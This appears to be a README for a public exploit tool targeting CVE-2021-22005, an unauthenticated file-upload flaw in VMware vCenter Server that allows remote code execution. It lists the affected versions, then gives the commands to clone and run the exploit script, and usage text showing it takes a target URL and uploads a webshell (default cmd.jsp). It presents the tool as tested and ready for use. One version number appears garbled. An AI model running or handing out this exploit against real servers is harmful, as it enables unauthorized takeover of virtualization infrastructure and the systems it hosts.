Introduction to 0x01 Vulnerability
Among them, the most serious vulnerability is the arbitrary file upload vulnerability in vCenter Server (CVE-2021-22005), which exists in the analysis service of vCenter Server, and its CVSSv3 score is 9.8. An attacker who has network access to port 443 on vCenter Server can remotely execute code on vCenter Server by uploading malicious files. The vulnerability can be exploited remotely without authentication, the attack complexity is low, and no user interaction is required.
- vCenter Server 7.0 < 7.0 U2c build-18356314
- vCenter Server 6.7 < 6.7 U3o build-18485166
- Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
- Cloud Foundation (vCenter Server) 3.x < KB85719 (188.8.131.52)
6.7 The vCenters Windows version is not affected
Note: This exp can only hit the Linux version of vCenter.
git clone https://github.com/shmilylty/cve-2021-22005-exp.git cd cve-2021-22005-exp python3 exp.py -h
usage: exp [-h] -t TARGET [-s SHELL] [-p PROXY] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET target url(e.g. https://192.168.1.1) -s SHELL, --shell SHELL local webshell file path(default cmd.jsp) -p PROXY, --proxy PROXY request proxy(e.g. http://127.0.0.1:1080)
This exp has passed the test of the target version VMware vCenter Server 7.0.0 build-16323968.